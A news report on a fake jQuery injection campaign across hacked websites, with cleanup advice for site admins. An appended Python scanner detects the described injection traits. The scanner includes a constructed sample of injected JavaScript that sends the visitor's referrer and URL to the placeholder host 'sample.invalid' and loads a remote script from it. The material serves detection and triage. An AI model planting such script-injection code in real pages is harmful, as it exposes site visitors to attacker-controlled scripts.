Historically, fake jQuery injections have been highly popular among cybercriminals, but the recently observed infection campaign has managed to compromise a very large number of domains, thus exposing millions of users to the malicious code.
With almost 70 million unique files on hacked websites containing the fake jQuery script, the infection has reached an abnormally high number of domains, Avast’s Alexej Savčin explains in a blog post. Since November, the security company has observed over 4.5 million users being exposed to these compromised websites, the researcher says.
According to Avast, the malicious code starts with a 10 millisecond countdown, which is a common practice in injection-type code, although a longer delay is more typical. Next, the “encodeURIComponent” function is used in almost every line to encode special characters (, / ? : @ & = + $ #).
“The final condition checks if variables contain necessary values and after evaluation another source for script is inserted. This URL is then used to increase SEO rank for other domains. Using a referral page and backlinks makes it more valid,” Savčin explains.
Site admins who have fallen victim to the infection are advised to start by cleaning their own computers, as the root source of the infection might be on their local machine. Next, they should scan their website for compromised files and try to clean them, or delete all of them and replace them with a recent, clean backup (they should, however, be wary of deleting system files).
The issue with this type of compromise is that every file must be clean for the infection to be completely removed: it is reinstated if even one seemingly insignificant file remains compromised. Moreover, if the website is hosted on a server alongside other infected sites, chances are that the infection will spread to it as well.
After cleaning the website, administrators are also advised to update their WordPress or Joomla installation, as older versions are more susceptible to compromise. They should also perform regular backups of their website, to make sure they can easily restore it to a clean state in case of compromise.
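As an added example (not Avast’s code or anything from the campaign itself), the heuristic below turns the traits described above, a very short `setTimeout` delay, heavy use of `encodeURIComponent`, reading the referrer, and dynamic insertion of a second script, into a scanner that a site admin can run over a web root while doing the file review. The regexes, the marker threshold and the two embedded samples are all constructed for illustration; the domain in the sample is a placeholder, not a real indicator.

```python
import re
from pathlib import Path

# Heuristic markers for the injection traits described in the article (constructed, not from the page).
PATTERNS = {
    # setTimeout with a delay under 100 ms (the article notes a 10 ms countdown).
    "short_delay_timer": re.compile(r"setTimeout\s*\(.*?,\s*\d{1,2}\s*\)", re.S),
    "uri_encoding": re.compile(r"encodeURIComponent\s*\("),
    "referrer_read": re.compile(r"document\.referrer"),
    # A second script element being created and pointed at an external source.
    "dynamic_script": re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)|\.src\s*="),
}

def score_js(source: str) -> dict:
    """Report which markers fire and how many times encodeURIComponent appears."""
    hits = {name: bool(p.search(source)) for name, p in PATTERNS.items()}
    hits["uri_encoding_count"] = len(PATTERNS["uri_encoding"].findall(source))
    return hits

def is_suspicious(source: str, min_markers: int = 3) -> bool:
    """Flag a file when at least min_markers of the traits occur together."""
    hits = score_js(source)
    return sum(1 for name in PATTERNS if hits[name]) >= min_markers

def scan_tree(root: str, exts=(".js", ".php", ".html")) -> list:
    """Walk a web root and return paths whose content matches the heuristic."""
    flagged = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            if is_suspicious(path.read_text(errors="ignore")):
                flagged.append(str(path))
    return flagged

# Constructed sample imitating the described traits; sample.invalid is a placeholder.
INJECTED_SAMPLE = """
setTimeout(function(){
  var r = encodeURIComponent(document.referrer);
  var h = encodeURIComponent(location.href);
  if (r && h) {
    var s = document.createElement('script');
    s.src = 'https://sample.invalid/jquery.js?r=' + r + '&h=' + h;
    document.head.appendChild(s);
  }
}, 10);
"""

# Constructed sample of ordinary jQuery usage that must not be flagged.
CLEAN_SAMPLE = "$(document).ready(function(){ $('#menu').slideDown(300); });"
```

Run `scan_tree("/path/to/webroot")` against a copy of the site and review every flagged file by hand; the heuristic is a triage aid, and a match on fewer than three markers is left unflagged on purpose.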